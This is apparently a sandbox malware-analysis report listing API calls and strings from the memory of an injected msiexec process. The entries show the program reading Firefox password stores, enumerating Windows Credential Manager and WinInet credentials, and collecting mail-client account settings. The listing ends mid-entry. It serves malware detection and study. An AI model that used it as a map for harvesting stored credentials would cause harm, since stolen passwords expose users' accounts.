                                                    • strlen.MSVCRT ref: 0040F1F9
                                                    • strlen.MSVCRT ref: 0040F207
                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                    • API String ID: 2003275452-3138536805
                                                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                    APIs
                                                    • memset.MSVCRT ref: 0040C3F7
                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                    • strrchr.MSVCRT ref: 0040C417
                                                    • _mbscat.MSVCRT ref: 0040C431
                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                    • API String ID: 1012775001-1343505058
                                                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                    APIs
                                                    • memset.MSVCRT ref: 00444612
                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                    • strlen.MSVCRT ref: 0044462E
                                                    • memset.MSVCRT ref: 00444668
                                                    • memset.MSVCRT ref: 0044467C
                                                    • memset.MSVCRT ref: 00444690
                                                    • memset.MSVCRT ref: 004446B6
                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                    • String ID: salu
                                                    • API String ID: 3691931180-4177317985
                                                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$FreeLoad
                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                    • API String ID: 2449869053-232097475
                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                    APIs
                                                    • sprintf.MSVCRT ref: 0040957B
                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                    • sprintf.MSVCRT ref: 004095EB
                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                    • memset.MSVCRT ref: 0040961C
                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                    • String ID: caption$dialog_%d$menu_%d
                                                    • API String ID: 3259144588-3822380221
                                                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                    APIs
                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Library$FreeLoad
                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                    • API String ID: 2449869053-4258758744
                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                    APIs
                                                    • wcsstr.MSVCRT ref: 0040426A
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                    • strchr.MSVCRT ref: 004042F6
                                                    • strlen.MSVCRT ref: 0040430A
                                                    • sprintf.MSVCRT ref: 0040432B
                                                    • strchr.MSVCRT ref: 0040433C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                    • String ID: %s@gmail.com$www.google.com
                                                    • API String ID: 3866421160-4070641962
                                                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                    APIs
                                                    • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                    • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                    • memset.MSVCRT ref: 004097BD
                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                    • API String ID: 1035899707-3647959541
                                                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                    • API String ID: 2360744853-2229823034
                                                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                    APIs
                                                    • strchr.MSVCRT ref: 004100E4
                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                    • _mbscat.MSVCRT ref: 0041014D
                                                    • memset.MSVCRT ref: 00410129
                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                    • memset.MSVCRT ref: 00410171
                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                    • _mbscat.MSVCRT ref: 00410197
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                    • String ID: \systemroot
                                                    • API String ID: 912701516-1821301763
                                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                    APIs
                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$strlen
                                                    • String ID: -journal$-wal$immutable$nolock
                                                    • API String ID: 2619041689-3408036318
                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                    APIs
                                                    • memset.MSVCRT ref: 0040F567
                                                    • memset.MSVCRT ref: 0040F57F
                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                    • String ID: $`{ h
                                                    • API String ID: 78143705-926978091
                                                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                    APIs
                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                    • wcslen.MSVCRT ref: 0040874A
                                                    • wcsncmp.MSVCRT ref: 00408794
                                                    • memset.MSVCRT ref: 0040882A
                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                    • wcschr.MSVCRT ref: 0040889F
                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                    • String ID: J$Microsoft_WinInet
                                                    • API String ID: 3318079752-260894208
                                                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                    APIs
                                                    • memset.MSVCRT ref: 004037EB
                                                    • memset.MSVCRT ref: 004037FF
                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                    • strchr.MSVCRT ref: 0040386E
                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                    • strlen.MSVCRT ref: 00403897
                                                    • sprintf.MSVCRT ref: 004038B7
                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                    • String ID: %s@yahoo.com
                                                    • API String ID: 2240714685-3288273942
                                                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                    APIs
                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                    • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                    • API String ID: 888011440-2039793938
                                                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                    APIs
                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                    • strchr.MSVCRT ref: 0040327B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringstrchr
                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                    • API String ID: 1348940319-1729847305
                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                    APIs
                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                    • API String ID: 3510742995-3273207271
                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                    APIs
                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                      • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                    • strchr.MSVCRT ref: 0040371F
                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                    • strlen.MSVCRT ref: 00403778
                                                    • sprintf.MSVCRT ref: 0040379C
